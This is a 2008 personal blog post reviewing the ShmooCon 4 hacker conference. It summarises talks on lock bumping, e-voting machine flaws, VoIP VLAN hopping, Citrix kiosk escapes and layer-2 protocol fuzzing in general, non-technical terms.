Wednesday, February 20, 2008

Shmoocon 4 in review

For those that have not attended or are not familiar with shmoocon, it's an annual hacker con. The event is held in Washington DC and additional event info can be found on their site at

Tickets are released on a timed basis and come in three classes... the early bird ticket for $75, the normal ticket for $150, and the I pissed around and didn't get a less expensive ticket for $300. When I say "timed basis", they have specific dates and times that they will make a certain number of each ticket class available. Needless to say, on the ticket release dates the shmoo ticketing server was quite loaded but luckily I was able to obtain one of the early bird special tickets.

Day One:

The con kicked off on Friday Feb-15 with a single track of talks. I missed the first few talks (schedule here) and caught a little more than the last half. Unfortunately I don't really recall the first talks, so they must not have been altogether that interesting for me. I primarily payed attention to the last three talks:
  • Hacking the Samurai Spirit - Isaac Mathis
  • New Countermeasures to the Bump Key Attack - Deviant Ollam
  • Keynote Address - J. Alex Halderman
Hacking the Samurai Spirit:

The premise of this talk was to discuss the current cultural differences, history and mindset of the Japanese as related to Information Security. While this talk was humerus I did not find it terribly technically relevant. The speaker seemed to more be giving a history of security related events over the past 60 years in Japan, though there were some good and interesting points in the end that did relate to Information Security. Specifically, the speaker detailed how there are several scams occurring concerning the uneducated internet user in Japan. A simple example of this type of scam would be a pr0n site that requires the user to click on an I Agree, Enter type link prior to gaining access to the goods. Once this action has been completed, the user is then told that they have just agreed to paying X amount of money to access the site and that if they do not pay said money they will be sued. The people in Japan are afraid of reprise of any type and typically will pay this immediately. So overall I would rate this talk somewhere in the middle due to it's humerus nature.

New Countermeasures to the Bump Key Attack

Having just sat through the history lesson re: Japan, I was certainly ready for something different and more exciting. New Countermeasures to the Bump Key Attack certainly delivered this for me. I (as many in the security community) have been aware for years about the gross weaknesses that exist in the physical lock world. Thanks to the consistent pounding and education of the world by people such as Deviant Ollam. This talk covered the basics of lock-picking using bump keys and modified bump keys then detailed how may lock manufacturers are dealing with this issue. The media for the presentation itself was well done and clear, further the presenter did a great job at getting the point across.

A challenge was also issued during this talk, the title "Gringo Warrior". The setting for Gringo Warrior is simple, you are a Gringo that got a little blitzed in Tijuana and woke up in a Mexican jail cell with no recollection of the night before. In walks the corrupt policia and tells you that you have to pay a fine, the cost of that fine is whatever money you have in your bank account. He tells you that he will leave you for an hour to consider this. Luckily while they were emptying your pockets they missed your lock-picking tools. Your challenge is to pick the handcuffs that you are in, pick the cell door, disable the cell guard and pick a lock cabinet that has your passport in it. At this point, you have a choice; you must either pick the front door lock to leave, or you can pick an additional locked door in the cabinet to obtain a handgun and shoot out a surveillance camera to sneak out a window. This was a timed event, the event winner took under a minute:30 to complete the entire course and received a social engineering kit (hardhat and several vendor specific polos)!


This talk was concerning the new electronic voting systems and their MANY security flaws. It was both interesting and somewhat technical but more detailing the process that they took to obtain their first voting machine to test (somewhat clandestine in nature and humerus). The short of it is, as we all now know, that these devices have historically been easily compromised both electronically and physically. One key point of humor is that diebold (the primary manufacturer) had a high resolution picture of the actual keys used to access the IO ports of the system on their website, from this picture they were able to successfully create a working keyset.

Day Two and Three:

I am bundling these days together and only writing about the talks that I found interesting for the remainder of this posting.
  • VoIP Penetration Testing: Lessons Learned -John Kindervag and Jason Ostrom
  • Got Citrix? Hack It! - Shanit Gupta
  • Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land" - Enno Rey and Daniel Mende
VoIP Penetration Testing

This talk primarly dealt with using the voiphopper tool to jump onto voice vlans and conduct your activities as needed there. The fun part would be to jump onto the voice vlan and do a little fuzzing using spike or the like ;-). Overall a fairly interesting talk and there were demonstrations that made it a bit more exciting.

Got Citrix? Hack It!

I found this talk to be fairly basic, but that said quite technically relevant. I think that we often do not consider the most simple way to get into something and that is why this was a good talk. The premise of this was hacking Citrix and primarily focused on using the Kiosk mode. The speaker pointed out that often while the kiosk has a limited set of initial applications available to be run, or force-ran that they hotkeys are still often active. Examples include cntl+n to open a new Internet Explorer Browser instance that now has the address bar in it, you can therefore browse wherever you want and grab a payload to further break into your mom's kiosk. Other examples are cntl+h (history) cntl + F1 (shortcut for cntl+alt+del) and so on.

Advanced Protocol Fuzzing

Probably the best talk of the con in my opinion, this talk focused on the steps that some German researches took to fuzz several layer 2 protocols. They worked though creating the protocol definitions in SPIKE and Sulley and their various reverse engineering processes from various sources including Wireshark. This talk also included a live demo of crashing a medium sized Cisco Cat using LLDP fuzzing techniques.

All the other talks...

I am sure that there were several other good talks, unfortunately due to the nature of three being scheduled at the same time, I was not able to see everything. Shmoocon does post videos of the talks on their site, so keep an eye out. Unfortunately I did attend several talks that were presented by fairly well known people, and I believe that this was the only reason that these talks were approved as they contained really no new or relevant information.

Overall I would rate shmoocon as a good time with decent material and good speakers. I mean, for $75 I can't complain, I certainly feel like I got my moneys worth. Perhaps next year or at an upcoming con I will present on HeX with the team, so keep an eye out!


1 comment:

Viola said...

Such a nice blog for those who are concerned about security both residentially and commercially. As I have got from Security Window Gates